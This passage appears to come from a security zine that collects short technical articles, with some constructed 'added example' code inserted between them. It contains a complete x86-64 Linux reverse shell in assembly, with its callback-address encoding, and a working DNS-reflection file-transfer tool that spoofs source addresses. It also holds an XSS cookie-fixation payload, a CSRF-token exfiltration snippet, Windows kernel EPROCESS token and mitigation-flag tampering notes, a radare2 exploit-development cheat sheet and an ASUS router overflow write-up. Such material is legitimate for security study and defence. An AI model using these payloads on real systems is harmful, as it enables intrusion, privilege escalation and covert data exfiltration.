chosen in this case. The APK to decompile is given after that. At last, 
the location where the Android Studio project needs to be placed is 
provided. 


When all is done, one can simply open Android Studio to analyse the code. 
For more information, one can visit the installation and usage guide here³. 
If you have any questions, please message me on Twitter: @LibraAnalysis⁴. 


1. https://github.com/pxb1988/dex2jar 
2. https://github.com/skylot/jadx 
3. https://maxkersten.nl/projects/androidprojectcreator/ 
4. https://twitter.com/LibraAnalysis 


Max 'Libra' Kersten (@LibraAnalysis on Twitter) 
Reverse Shell With Auth For Linux64 


REVERSE SHELL WITH AUTH FOR LINUX64 


This payload will connect back to a remote location over TCP/IPv4 and 
launch a shell only if a valid password is provided. 

The process consists of 5 steps, each one involving one system call: 

1 Create a new socket 
2 Connect to the target address 
3 Read 8 bytes and check if they match the password 
4 Duplicate each standard stream (stdin, stdout and stderr) into the 
  socket, allowing the target to send and receive messages 
5 Execute a shell 

"How do I make a syscall?" you may ask. 
Place the syscall number into RAX. 
Parameters go into: RDI, RSI, RDX, R10, R8, R9 and the stack. 
Use the syscall instruction and... let the kernel do the magic! 

Configs for the payload: 

_TARGET: 0xfeffff80a3eefffd 
To get this number: 
1 IP to hex: 127.0.0.1 -> 0x7f000001 
2 Port to hex: 4444 -> 0x115c 
3 Constant for IPv4: IPv4 -> 0x0002 
4 Put it all together: 0x0100007f5c110002 
  (notice how IP and port endianness change!) 
5 Extra step: as the original value has null bytes, it was replaced with 
  its one's complement: 0x0100007f5c110002 -> 0xfeffff80a3eefffd 

_PASS: 0x214e49454d54454c 
Hex little-endian for "LETMEIN!" (echo -n 'LETMEIN!' | rev | xxd) 

The code provided favors readability instead of size or speed. Many 
improvements can be done to it. I leave that exercise to the reader. 
Happy hacking!! 

; 1 - Create a socket 
push 0x29               ; socket syscall n° 
pop rax 
xor rdx, rdx            ; zero out rdx 
push 0x02               ; 2 means IPv4 
pop rdi 
push 0x01               ; 1 means TCP 
pop rsi 
syscall 
mov r15, rax            ; save socket in r15 

; 2 - Connect to the target 
mov rdi, rax 
mov rcx, _TARGET 
not rcx                 ; rcx = 127.0.0.1:4444 
push rcx 
mov rsi, rsp 
push 0x10               ; IPv4 address length 
pop rdx 
push 0x2a               ; connect syscall n° 
pop rax 
syscall 

; 3 - Read password from client 
read_pass: 
xor rax, rax            ; read syscall (0) 
mov rdi, r15            ; rdi = socket fd 
push 0x08 
pop rdx                 ; rdx = 8 (bytes to read) 
mov rsi, rsp            ; rsi -> buffer 
syscall 
; Check password 
mov rax, _PASS 
mov rdi, rsi 
scasq                   ; compares rax vs [rdi] 
jne read_pass 

; 4 - Duplicate streams 2, 1 and 0 
mov rdi, r15            ; rdi = socket fd 
push 0x02               ; 2 == stderr 
pop rsi 
loop_through_stdfds: 
push 0x21               ; dup2 syscall n° 
pop rax 
syscall 
dec rsi                 ; next stream 
jns loop_through_stdfds 

; 5 - Execve("/bin/sh") 
xor rdx, rdx 
push rdx 
; echo -n '//bin/sh' | rev | xxd 
mov rbx, 0x68732f6e69622f2f 
push rbx 
mov rdi, rsp 
push rdx 
mov rdx, rsp 
push rdi 
mov rsi, rsp 
push 0x3b               ; execve syscall n° 
pop rax 
syscall 

Alan Vivona @syscall59 
medium.syscall59.com 
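Added example, not from the article: the _TARGET encoding steps above as a pair of Python functions, the decode direction being the one an analyst needs to recover a callback address from a constant found in a sample, and a has_nul_byte check that shows why step 5 exists. The values are the article's; the function names are constructed.

```python
import socket
import struct

MASK64 = (1 << 64) - 1
AF_INET = 2  # sin_family value on Linux, as in the article


def encode_target(ip, port, complement=True):
    """Pack the first 8 bytes of a sockaddr_in (family LE16, port in network
    byte order, IPv4 in network byte order), read them back as one
    little-endian qword, and optionally apply the one's complement the
    article uses to get rid of NUL bytes in the immediate."""
    raw = struct.pack("<H", AF_INET) + struct.pack("!H", port) + socket.inet_aton(ip)
    value = struct.unpack("<Q", raw)[0]
    return (~value) & MASK64 if complement else value


def decode_target(value, complemented=True):
    """Inverse of encode_target: recover (ip, port) from a 64-bit constant.
    Raises ValueError when the bytes do not look like an AF_INET sockaddr."""
    if complemented:
        value = (~value) & MASK64          # undo the NOT the shellcode performs
    raw = struct.pack("<Q", value)
    family = struct.unpack("<H", raw[0:2])[0]
    if family != AF_INET:
        raise ValueError("not an AF_INET sockaddr (family=%d)" % family)
    port = struct.unpack("!H", raw[2:4])[0]
    return socket.inet_ntoa(raw[4:8]), port


def has_nul_byte(value):
    """True if the qword would contain a 0x00 byte when emitted as an immediate."""
    return b"\x00" in struct.pack("<Q", value)


if __name__ == "__main__":
    raw = encode_target("127.0.0.1", 4444, complement=False)
    print("raw sockaddr qword : 0x%016x (NUL bytes: %s)" % (raw, has_nul_byte(raw)))
    enc = encode_target("127.0.0.1", 4444)
    print("one's complement   : 0x%016x (NUL bytes: %s)" % (enc, has_nul_byte(enc)))
    print("decoded            :", decode_target(enc))
```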
On escalating your bug bounty findings 


Based on publicly-disclosed bug bounty reports, technical 
quirks, such as the ones listed in the HTTP cookies 
RFC¹, are rarely being used to escalate popular attack 
vectors like cross-site scripting (XSS). The lack of exploring 
issues further could be a result of the competitiveness of 
bug bounty programs, where bug bounty hunters attempt 
to submit reports immediately upon discovery of a poten- 
tial problem. Another cause may be the lack of bug bounty 
programs rewarding reporters based on the impact of the 
reported vulnerability. In this short paper, we want to 
cover two noteworthy reports where we combined further 
issues to demonstrate the impact of the vulnerability. The 
goal here is to encourage readers to toy around with their 
findings and incorporate further minor issues into their 
proof of concepts to illustrate the impact of their findings. 


Session fixation on Shopify enabling account 
takeover 


As Shopify’s security policy states, cross-site scripting on 
*.shopifycloud.com and *.shopifyapps.com is out of 
scope because both of these hosts are littered with XSS. 
In other words, cross-site scripting on those hosts would 
be considered an invalid finding². 

Upon discovering an XSS flaw in Shopify’s SDK, 
Filedescriptor found that specific Shopify-built applications 
used signed sessions or session identifiers. This discovery 
led to Filedescriptor noticing that where session identifiers 
were used, the applications were not generating fresh iden- 
tifiers on login. To put it another way, these applications 
were linking whatever session identifier was present in the 
cookie header upon sign in with the authenticated user. 
This is known as Session Fixation and anybody that runs 
a bug bounty program has almost certainly seen this type 
of behaviour reported as is without the reporter chaining 
the issue with other findings to demonstrate exploitability. 

As a result of this Session Fixation in certain appli- 
cations belonging to Shopify, Filedescriptor was able to 
leverage an XSS flaw in an out-of-scope asset to affect 
www.shopify.com itself. A hypothetical attack scenario 
could take place as follows. 


• An adversary visits the application where they encountered the Session Fixation and takes note of the session identifier the application assigns to them; 

• The attacker uses the XSS on *.shopifycloud.com and sets a cookie on behalf of the victim, scoped to all of Shopify's subdomains: 


document.cookie='_flow_session=EVIL;domain=.shopifycloud.com;path=/'; 


¹ https://tools.ietf.org/html/rfc2965 
² https://hackerone.com/shopify 
• The attacker forces the victim to log in to https://www.shopify.com/admin/apps/flow, which redirects to victim.shopify.com/admin/apps/flow and then triggers the login flow; 

• Finally, the attacker can use the original session identifier to authenticate as the victim. 
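Added example, not from the paper: a toy model of the login behaviour described above, run once with the flaw (the identifier presented in the cookie is bound to the authenticated user) and once with the fix (a fresh identifier is issued on login, and the presented one is dropped). SessionApp and fixation_chain are constructed names; the in-memory store stands in for the real application.

```python
import secrets


class SessionApp:
    """Constructed toy of the login behaviour the report describes; it models
    only session-id handling.  rotate_on_login=False reproduces the flaw,
    True is the fix: a fresh id is issued when the user authenticates."""

    def __init__(self, rotate_on_login):
        self.rotate_on_login = rotate_on_login
        self.sessions = {}  # session id -> {"user": str or None}

    def touch(self, cookie_sid):
        """Pre-auth request.  As in the affected apps, an id the client
        presents that the server has never seen is adopted as-is; only a
        missing cookie gets a server-generated id.  Returns the id in use."""
        if cookie_sid is None:
            cookie_sid = secrets.token_urlsafe(32)
        self.sessions.setdefault(cookie_sid, {"user": None})
        return cookie_sid

    def login(self, cookie_sid, user):
        """Authenticate; returns the id the Set-Cookie header would carry."""
        sid = self.touch(cookie_sid)
        if not self.rotate_on_login:
            self.sessions[sid]["user"] = user   # flaw: binds the presented id
            return sid
        fresh = secrets.token_urlsafe(32)       # fix: new id, presented one dropped
        self.sessions[fresh] = {"user": user}
        del self.sessions[sid]
        return fresh

    def whoami(self, cookie_sid):
        return self.sessions.get(cookie_sid, {}).get("user")


def fixation_chain(app, victim="victim@example.com"):
    """Replays the report's chain against `app` and returns the user the
    attacker's original id resolves to afterwards (None: takeover failed)."""
    attacker_sid = app.touch(None)      # 1: attacker notes the id given to them
    planted_cookie = attacker_sid       # 2: same id planted into the victim's
                                        #    cookie via the XSS on a sibling host
    app.login(planted_cookie, victim)   # 3: victim logs in carrying that cookie
    return app.whoami(attacker_sid)     # 4: attacker reuses the original id


if __name__ == "__main__":
    print("no rotation :", fixation_chain(SessionApp(rotate_on_login=False)))
    print("rotation    :", fixation_chain(SessionApp(rotate_on_login=True)))
```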


Combining minor issues with an unauthenticated 
reflected XSS to gain access to authenticated func- 
tionality 


While collaborating with Alessandro De Micheli³, a very 
basic unauthenticated reflected cross-site scripting flaw 
was discovered on a private program where, based on past 
experiences, the reporters knew this private bug bounty 
program incorporates the impact into the bounty amount. 
To escalate the issue further and gain access to authenti- 
cated functionality, Alessandro and Edwin examined the 
main application looking for any minor flaws that could 
be leveraged. This was when they stumbled across an 
endpoint with the following HTTP response (modified for 
brevity): 


HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
x-csrf-jwt: eyAAAAAAAAAA... 


With a simple AJAX call, it was possible to retrieve the 
x-csrf-jwt token. 


$.ajax({ 
    type: 'GET', 
    url: 'https://example.com/endpoint', 
    success: function(data, status, r){ 
        alert(r.getResponseHeader('x-csrf-jwt')); 
    }, 
    error: function(r, status, error){ 
        alert(r.getResponseHeader('x-csrf-jwt')); 
    } 
}); 


Further, the users' settings panel on the target ap- 
plication had a feature which allowed people to export 
all their user data and history — similar to the “GDPR” 
features you might see on Uber. By using the exfiltrated 
x-csrf-jwt token, the fact that the login panel was frame- 
able, the “GDPR” export function, and the XSS vulnera- 
bility, Alessandro and Edwin would have been able to leak 
authenticated data from an unsuspecting user. 

The fully-fledged exploit is too long to include in this 
paper, so a summary of the code is listed below. 


• Create iframe of login panel; 

• AJAX call to exfiltrate x-csrf-jwt token and initiate download using token; 

• Wait for 200 OK status code from /export endpoint and fetch exported ZIP from user's /download endpoint. 


³ https://hackerone.com/europa 


Edwin "EdOverflow" Foudil 
Fun with process descriptors 


Unlike the early versions of MS-DOS (1.x-2.x), the 
first versions of UNIX, Mac, and AmigaOS were de- 
signed as multitasking operating systems [1]. The basic 
primitive which allows this design was a process. We 
understand that a process is a program in execution. 
Processes are identified by unique numbers called PIDs. 
After 40 years, this fundamental abstraction is still used 
by all modern operating systems. 

The design of operating systems is constantly evolv- 
ing, and with time it turned out that the ordinary de- 
sign of processes has some downsides. First is the race 
condition while we try to destroy (kill) a process. As 
mentioned before, the process is identified by a single 
number (PID). When we use pkill(1), we are providing a 
name of the executable we want to kill. The application 
has to create a list of processes and their corresponding 
PIDs. pkill will send the signal (SIGTERM) to destroy 
the process to all PIDs matching the sought phrase. The 
race condition occurs while we are going through the list 
of executables. After we have created the list, the pro- 
cess may disappear and the PID may be reused. In such 
a situation, a signal will be sent to the recently created 
process, which may have a different name/executable. 

By default the maximum PID value is 32,768 on 
Linux¹ and 99,999 on FreeBSD². If this number is hit 
the counter starts using the lowest of the unused PIDs. 
In an environment with a lot of processes being spawned, 
the probability of a short-term PID reuse is significant. 
It is also worth mentioning that some configurations use 
randomised PIDs for a debatable security benefit³. 

Another interesting problem with this design is that 
it’s not friendly for libraries. Right now if our library 
would like to create a new process, the application using 
it must be aware of such behavior. The point is that if 
the application uses the wait(2) syscall⁴, it may receive 
the signal from a process created by the library. If a pro- 
gram is not prepared for that it can crash in unexpected 
and random ways. 

An interesting question is: should libraries behave in 
such an “unexpected” way and spawn new child pro- 
cesses? Is it a bad design? Not necessarily. If libraries 
try to secure themselves through privilege separation or 
using capabilities systems (like Capsicum) it can be use- 
ful. The same goes for optimisation. If libraries are try- 
ing to use multithreading for optimising purposes should 
the main program be aware of that? 

For those two reasons, in 2010 we developed a new 


¹ It can be read from /proc/sys/kernel/pid_max. It can be increased up to 2²² on 64-bit Linux. 

² It can be read and decreased using kern.max_pid. 

³ https://www.whitewinterwolf.com/posts/2015/05/23/do-randomized-pids-bring-more-security/ 

⁴ wait(2) and wait2(2) are used to wait for a status change of all child processes. The same goes for wait4(2) and waitpid(2) with -1 argument as wpid. 
concept for processes called "process descriptors"⁵ in 
FreeBSD [2]. Instead of using a fork(2) syscall we can 
use a pdfork(2) syscall to spawn a new process. This 
syscall will return a handler called a process descrip- 
tor, which corresponds to the descriptor table - filedesc 
structure in FreeBSD kernel. Process descriptors behave 
like other descriptors (files, sockets, pipes etc), we can 
duplicate them (dup(2)), send them to other processes 
(via UNIX domain sockets), and close them (close(2)). 

If there exists at least one process descriptor, the 
structures representing the process in kernel cannot be 
removed even if the process exited. Thanks to that we 
can check the status of a process even after it has ex- 
ited - solving the pkill(1) problem. Right now the only 
proper way to fetch the status of the process is through 
using kqueue(2). The pdfork(2)'ed process will not send 
SIGCHLDs to the parent process even if the parent pro- 
cess is wait(2)ing for all processes. When all of the pro- 
cess descriptors are closed, the process is terminated⁶. 

In the Linux world there have also been attempts to 
create process descriptors by adding an additional flag 
- CLONE_FD - to the clone(2) syscall, which is used to 
spawn a new process in this kernel. The initial work was 
started in 2015 by Josh Triplett, but never landed in the 
Linux kernel [3]. Recently Linux developers introduced 
a new flag - CLONE_PIDFD - which allows that [4]. 
However, in the v5.2 Linux kernel tag the only reliable way 
to access procfs process information (/proc/<pid>/) 
through a PIDFD is to open the directory via the process' 
PID and validate that the process is still running by send- 
ing a signal to it via the PIDFD. There are some proposals 
to use pidfd_open to simplify this process [5]. 

Process descriptors give a reliable handle to the 
process. Through introducing this concept, we enable 
libraries to spawn new processes transparently to the 
application and prevent race conditions when signalling 
or managing the process. In today's world, with high per- 
formance and short-living processes, it is unacceptable 
to have an unreliable interface to handle processes. It 
would be interesting to see this concept incorporated 
more widely. 
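The Linux side of the argument, as an added example that is not from the article: signalling a child through a pidfd (Python's os.pidfd_open and signal.pidfd_send_signal, Linux 5.3+ and Python 3.9+) instead of through its PID number, and then reusing the same handle after the child has been reaped. The function name and the child command are constructed; where pidfds are unavailable or forbidden by the sandbox the function returns None instead of failing.

```python
import os
import signal
import subprocess
import sys


def pidfd_supported():
    """pidfd_open(2) / pidfd_send_signal(2) wrappers arrived in Python 3.9 (Linux only)."""
    return hasattr(os, "pidfd_open") and hasattr(signal, "pidfd_send_signal")


def signal_via_pidfd(argv=(sys.executable, "-c", "import time; time.sleep(30)")):
    """Spawn a child, hold a pidfd on it and signal it through that handle.
    Returns (exit_status, second_attempt): second_attempt records what the
    kernel does when the same handle is used again after the child is gone.
    Returns None when the platform (or a seccomp policy) has no pidfd support."""
    if not pidfd_supported():
        return None
    child = subprocess.Popen(list(argv))
    try:
        fd = os.pidfd_open(child.pid)
    except OSError:                      # ENOSYS on old kernels, EPERM under seccomp
        child.kill()
        child.wait()
        return None
    try:
        signal.pidfd_send_signal(fd, signal.SIGTERM)   # handle, not a bare number
        status = child.wait()                          # reaps the child
        # The PID number is now free to be handed to an unrelated process, so a
        # kill(pid) here could hit a stranger.  The pidfd still names the
        # original, reaped child, so the kernel refuses with ESRCH instead.
        try:
            signal.pidfd_send_signal(fd, signal.SIGTERM)
            second = "delivered"
        except ProcessLookupError:
            second = "ESRCH"
        return status, second
    finally:
        os.close(fd)


if __name__ == "__main__":
    print(signal_via_pidfd())
```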
⁵ It is worth noting that in the Linux kernel world "process descriptors" also refer to the task_struct structure, which contains all the information about a single process. Here we stick to the userland process descriptors. 

⁶ This behavior may be changed by passing the PD_DAEMON flag to the pdfork(2) syscall. 
Bruno Gonçalves de Oliveira (mphx2) 


While exploiting the Windows kernel, there are multiple 
objects that an attacker can interact with to gain 
privileges in userspace. Since the kernel is the base for 
everything running in userland, all characteristics from 
those objects can be compromised. One interesting 
object that enables this type of exploitation is the 
EPROCESS. This type of object is created in kernel 
space for any process started in userspace. This object 
carries around all the elements belonging to a given 
process including its security elements. This article 
describes three of the elements that can be utilized for 
exploitation purposes: Token, MitigationFlags* and 
Protection. 

Token is a pointer that indicates the ACLs (Access 
Control Lists) that are being used by the process, so if it 
is possible to modify this element using any kernel 
vulnerability (such as with write-what-where 
exploitation primitives) it would be feasible to change the 
process privileges. For example, replacing an 
unprivileged token from an existing process such as 
cmd.exe with a SYSTEM token, so every command that 
is run within this cmd.exe process, would run as 
SYSTEM - an administrator / high-privilege account. 

The offset for the token in Windows 10 is 0x358 (so far), 
so the EPROCESS address+0x358 will refer to the 
pointer for the token in the specific process. As shown 
below, the Token is a pointer to a structure that will have 
all the ACLs in place for the process. 


lkd> dt _EPROCESS ffff8e838cd22080 Token 
nt!_EPROCESS 
   +0x358 Token : _EX_FAST_REF 
lkd> dq ffff8e838cd22080+0x358 
ffff8e83`8cd223d8  ffffc503`ef75997b 00000000`00000000 


In a different situation, it is also possible to lower the 
privileges of a process and then be able to reach it with 
an unprivileged account (for example lsass.exe) 
(1). It is also possible to edit the ACLs in the token, but 
that will not be covered here. This method could be 
useful if the attacker does not want to raise suspicion 
due to an active process with elevated privileges. 

Also in Windows 10, there are another two elements not 
as popular as the Token but interesting as well: the 
MitigationFlags (+0x828) and MitigationFlags2 (+0x82c). 
These become handy when administrative privileges are 
not enough, for example while escaping a sandboxed 
application: these flags could be modified to disable 
security protections of the application such as ACG, 
CIG, CFG and others (2). 

twitter.com/mphx2 


lkd> dx -id 0,0,ffff8e8390eea580 -r1 (*((ntkrnlmp!_EPROCESS *)0xffff8e838cd22080)).MitigationFlagsValues 
<redacted> 
    +0x000 ( 0: 0) ControlFlowGuardEnabled : 0x1 [Type: unsigned long] 
    +0x000 ( 1: 1) ControlFlowGuardExportSuppressionEnabled : 0x0 [Type: unsigned long] 
    +0x000 ( 2: 2) <redacted> 


Disabling these protections would allow the attacker to 
extend the attack: allocating RWX memory pages or 
disabling the ROP protection for further exploitation. 
Another resource on EPROCESS that can be useful for 
exploitation is the Protection field, at offset +0x6ca. This 
flag sets the integrity of the process and enables the 
Protected Process Light (PPL) protection. This element 
protects the process' handles against any loading or 
modification even under the same Token (3). 


lkd> dx -id 0,0,ffff9b85b644c080 -r1 (*((ntkrnlmp!_PS_PROTECTION *)0xffff9b85b5ec5c4a)) 
(*((ntkrnlmp!_PS_PROTECTION *)0xffff9b85b5ec5c4a))                 [Type: _PS_PROTECTION] 
    [+0x000] Level            : 0x61 [Type: unsigned char] 
    [+0x000 ( 2: 0)] Type     : 0x1 [Type: unsigned char] 
    [+0x000 ( 3: 3)] Audit    : 0x0 [Type: unsigned char] 
    [+0x000 ( 7: 4)] Signer   : 0x6 [Type: unsigned char] 


These protections can be disabled by setting this byte to 
null (0x0). This flag also limits the debugging of the process, 
since it prevents it from being handled by any other process, so 
disabling it will allow this interaction as well. 

References: 
[1] https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf 
[2] https://2017.zeronights.org/wp-content/.../Abusing%20GDI%20for%20ring0%20exploit%20primitives%20-%20Evolution... 
[3] http://www.alex-ionescu.com/?p=97 
MOV your Exploit Development Workflow to [r2land] 


[Intro]> 


checksec.sh, metasploit's pattern_create & pattern_offset, file, readelf, ropgadget, gdb-peda... if you want 
to reduce the amount of tools for your exploit development workflow - move to the radare2 framework. 


[Executable File Information]> 

File and security attributes / Checksec   i~pic,canary,nx,crypto,stripped,static,relocs 
Show entry point                          ieq 
Show imports                              ii 
Show exports                              iE 
Show strings                              iz 
Get address of func@plt                   ?v sym.imp.<func_name> 
Get address of func@got                   ?v reloc.<func_name> 
Show sections                             iS 
Grep section permissions                  iS~<permission>                 ; Tilde "greps" entries 


[Debugging/Analysis]> 

Debug binary                              $ r2 -d <program> [<arg1>] 
Debug binary without ASLR                 $ r2 -d rarun2 program=<program> aslr=no [arg1=<arg>] 
Follow fork mode                          e dbg.forks = true 
Enter Visual Mode                         V! 
Continue, Step, Step over                 dc, ds, dso 
Backtrace                                 dbt 
Auto analysis of binary                   aaa                             ; Usually performed as first command 
Print disassembly                         pdf @ <func_name/address>       ; @ selects functions/addresses 
Print xrefs to address                    axt @ <func_name/address> 


[Memory Analysis]> 

Search for string                         "/ <string>" 
Search for hex                            "/x <bytes>" 
Search for asm instructions               "/c <mnemonics>" 
Memory telescoping                        pxr @ <register>                ; Pretty print/Smart dereferences 
Register telescoping                      drr 
Show memory maps                          dm                              ; Needs to be in debug mode 
Show map of heap                          dmh 
List loaded modules                       dmm 


[Exploitation]> 

Print de-bruijn pattern                   $ ragg2 -P <length> -r 
Get offset from pattern                   wopO <pattern fragment>         ; Similar to pattern_offset.rb 
Get offset from IP                        wopO dr <instruction ptr name>  ; Use after segfault 
Search for ROP gadgets                    /R <gadget> 
Display ROP gadgets linear                /RL <gadget>                    ; Similar to ropgadget.py 
Show ROP options                          e?rop 
Set max instructions/gadget               e rop.len=<nr. of instructions including ret> 
Assemble asm instructions                 $ rasm2 -a <arch> -b <bits> "<mnemonics>" 
Disassemble opcodes                       $ rasm2 -a <arch> -b <bits> -d <bytes> 
Generate shellcode                        $ ragg2 -a <arch> -b <bits> -i exec 
DNS Reflection done right 


The Domain Name System is almost as old as the internet. 
Its specific architecture makes it a good abuse point for 
attackers. In this short paper I will describe what 
DNS Reflection is, why malicious actors tend to use it and 
why you might want to use it. 


Let’s imagine a server behind a firewall that restricts the 
traffic only to Linux package repository and DNS servers. 
That means the packets sent from attacker’s computer 
will not reach victim server and vice versa. To send the 
packet to the server, we need to spoof the source 
address of the IP packet, so the firewall will “think” that 
the packet was sent from an allowed address. 


Why do attackers reflect through DNS servers? A good 
reason is traffic amplification, which can further 
increase the impact of DoS attacks by making use of the 
fact that DNS responses tend to be larger than DNS 
requests. The reflection is possible because the 
Domain Name System by default uses UDP, 
which is connectionless. Another thing is that DNS is 
probably the last protocol you would block in your 
firewall. 


[Figure: Attacker, DNS server and Victim server; illustrated DNS Amplification attack (black arrows) and communication over DNS (blue and black arrows)] 


Why would you use DNS Reflection? Assume that you 
want to communicate with the mentioned server, and you 
want a response back from it. A good example can be a 
remote shell ;). There is an easier and more common 
solution: creating your own DNS server, then 
communicating through fake queries. This is a good 
method, but I want to show you a way which does not 
require you to set up any network infrastructure. You 
just need to have IPv6 enabled to simplify things, 
due to its direct-connection nature (there is no NAT). 


https://github.com/srakai 
This example Python code can be used to send a file to 
another computer without a direct connection 
between these 2 machines. This is achieved by splitting 
it into 60-byte chunks (maximum length of a single 
domain) and using the DNS Reflection technique to deliver 
packets. 

Use it for educational purposes only, in networks that 
you own. Don’t stress the DNS servers! Remember that 
this can piss off your internet provider, so use with 
caution. 


Sender code: 
#!/usr/bin/python3 

from kamene.all import * 
import base64, time, sys 


dnsaddr = "2620:119:35::35" # OpenDNS as an example 
send_delay = 0.8 


def send_packet(ip, packet_data): 
    # base64 keeps the chunks usable as a DNS name; '-' marks the end of the message 
    encoded_message = base64.b64encode(packet_data.encode('ascii')) + b'-' 
    encoded_message_size = len(encoded_message) 
    for i in range(0, encoded_message_size, 60): 
        data = encoded_message[i:i+60] 
        # query carrying the chunk as qname; the source is set to the receiver 
        # so that the server's reply is reflected to it 
        DNSpacket = IPv6(dst=dnsaddr, src=ip)/UDP(sport=RandShort())/DNS(id=1337, rd=0, z=0, tc=1, qd=DNSQR(qname=data, qtype="A", qclass="IN")) 
        send(DNSpacket, verbose=0) 
        time.sleep(send_delay) 


if len(sys.argv) < 3: 
    print(f'{sys.argv[0]} receiver_ipv6_addr data_file') 
    sys.exit() 

send_packet(sys.argv[1], open(sys.argv[2]).read()) 


Receiver code: 

#!/usr/bin/python3 

import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from kamene.all import * 

import base64, sys 


def receive_packet(listen_iface): 
    data = bytearray() 
    while not b'-' in data: 
        # one reflected response at a time; only transaction id 1337 is ours 
        DNSPacket = sniff(iface=listen_iface, filter="src port 53", count=1) 
        if DNSPacket[0].haslayer(DNS) and DNSPacket[0].getlayer(DNS).id == 1337: 
            data += DNSPacket[0].getlayer(DNS).qd.qname[:-1]  # drop the trailing '.' 
    print(base64.b64decode(data[:-1]).decode('ascii'), end='')  # drop the '-' end marker 


if len(sys.argv) < 2: 
    print(f'{sys.argv[0]} listen_interface') 
    sys.exit() 

receive_packet(sys.argv[1]) 
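Added example, not the article's code: the same reflection seen from the receiving host's side, as detection logic. It matches inbound DNS responses against the outbound queries the host actually sent; responses with no matching query are the reflected deliveries the receiver above relies on, and answered queries with a large response/request size ratio are the amplification cases. The log format, the sample lines and the function names are constructed for this example.

```python
import re

# Constructed sample log (not from the article): one DNS datagram per line,
# as a host-side sensor might record it.  Transaction id 1337 never left
# this host, so the two id=1337 responses are reflected deliveries.
SAMPLE_LOG = """\
dir=out src=2001:db8::10 dst=2620:119:35::35 id=4242 qname=example.com. len=45
dir=in  src=2620:119:35::35 dst=2001:db8::10 id=4242 qname=example.com. len=61
dir=in  src=2620:119:35::35 dst=2001:db8::10 id=1337 qname=SGVsbG8gd29y len=90
dir=in  src=2620:119:35::35 dst=2001:db8::10 id=1337 qname=bGQh- len=80
dir=out src=2001:db8::10 dst=2620:119:35::35 id=7 qname=isc.org. len=40
dir=in  src=2620:119:35::35 dst=2001:db8::10 id=7 qname=isc.org. len=3100
"""

LINE_RE = re.compile(
    r"dir=(\w+)\s+src=(\S+)\s+dst=(\S+)\s+id=(\d+)\s+qname=(\S+)\s+len=(\d+)")


def parse_log(text):
    """Parse the constructed format into (dir, src, dst, txid, qname, length)."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d, src, dst, txid, qname, n = m.groups()
            records.append((d, src, dst, int(txid), qname, int(n)))
    return records


def find_reflections(records, amp_threshold=10.0):
    """Match every inbound response against the outbound query with the same
    resolver, client, transaction id and qname (case-insensitive, as DNS is).
    Returns (unsolicited, amplified):
      unsolicited: (resolver, txid, qname, length) responses with no matching
                   query, i.e. traffic reflected at this host by a third party;
      amplified:   (qname, ratio) answered queries whose response/request size
                   ratio reaches amp_threshold."""
    pending = {}                  # (resolver, client, txid, qname) -> request length
    unsolicited, amplified = [], []
    for d, src, dst, txid, qname, n in records:
        key_name = qname.lower()
        if d == "out":
            pending[(dst, src, txid, key_name)] = n
            continue
        key = (src, dst, txid, key_name)
        if key not in pending:
            unsolicited.append((src, txid, qname, n))
            continue
        ratio = n / pending.pop(key)
        if ratio >= amp_threshold:
            amplified.append((qname, ratio))
    return unsolicited, amplified


if __name__ == "__main__":
    unsolicited, amplified = find_reflections(parse_log(SAMPLE_LOG))
    for resolver, txid, qname, n in unsolicited:
        print(f"reflected response from {resolver} id={txid} qname={qname} ({n} bytes)")
    for qname, ratio in amplified:
        print(f"amplified answer for {qname}: {ratio:.1f}x")
```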


External links: 
https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/ 
https://kamene.readthedocs.io/en/latest/introduction.html#about-sca 
The Router Security Is Decadent and Depraved 


by Igor Chervatyuk 


There is nothing in the world more helpless and 
irresponsible and depraved than a man looking into the 
depths of router security, and at some point last year 
my colleague and I jumped into that rotten stuff with 
moderate success. We found and reported three 
vulnerabilities to Asus for home-purpose wireless 
routers and one of them led to remote code execution 
for an unauthenticated attacker. Buy the ticket, take the 
ride, this is CVE-2018-8879¹. 


The approach to look for vulnerabilities was as simple 
as possible: dumping the names of all the available files in 
the web-server directory and running through them in 
order to find out which pages are accessible from the web without 
authentication. Among the others there was one, 
ironically, related to parental control and content 
filtering. The page was created in a way that the information 
printed on the screen is passed using URL parameters. 
There were three of them: mac, flag and cat_id. Shoving 
multiple "A"s into one of them resulted in nothing. 
Except, according to the internal log, the HTTPd daemon 
crashed and restarted each time I sent large malformed 
input, looking for a slight sign of malfunction. 


Attaching GDB to the process showed that it was really a 
classic textbook generic buffer overflow, except it had a 
lot of restrictions. URL parameters are parsed by means 
of the web-server and, prior to the overflow, mangled 
according to the used parameter. For instance, the 'mac' 
parameter expects a string delimited with colons. The most 
promising parameter, 'flag', was mangling input too. If 
we passed capital "A"s to the parameter it would 
overwrite the PC register with 0x61616160². In addition to 
lower-casing characters, input is also being truncated. 


Using checksec shows that the HTTPd daemon acts as a 
hardcore alcoholic with 30 years of experience in the 
field in the company of well-respected sommeliers at a 
wine degustation. All related libraries are compiled with 
full security precautions, while the HTTPd daemon has 
no RELRO, canary, PIE or FORTIFY whatsoever. 


Running ropper against target binary cheers us with lots 
of promising gadgets. 


1. The bug was found and exploited with the immense help of Andrey Basarygin, who 
is listed as co-author of all three CVEs (the other two are 2018-8877, 2018-8878) that 
will probably never be disclosed because I'm lazy and MITRE ignores my e-mails. 
On a serious note, the vulnerability was discovered in the Merlin firmware, which is a 
successor of the Asus stock firmware and partially shares its code base. Supposedly, 
any model that has a firmware older than 384_20379 would be vulnerable. No 
information on 382_xxxx or the older 380_xxxx branches, but they are 
developed in parallel. 


2. AFAIK, ARM’s PC register aligns to power of 2, so last byte is being rounded. 
riddle % ropper -I 0x00008000 -b 00 -f httpd 


0 gadgets found 


Let's consider our options for a minute:

1) No eavesdropping on stack addresses, and searching for another vulnerability makes Johnny a dull boy³;

2) No jumping to shellcode for this overflow, since a non-executable stack has been a thing for at least two hundred years. The flag restrictions and the length of 500-something bytes prior to the PC overwrite do not make things any easier;

3) No ROP chain, since it requires multiple null bytes.


At this point one should start thinking about where life went sideways, counting dubious life choices starting from high school and considering the more accessible career of a village fool. However, no trick, no article.


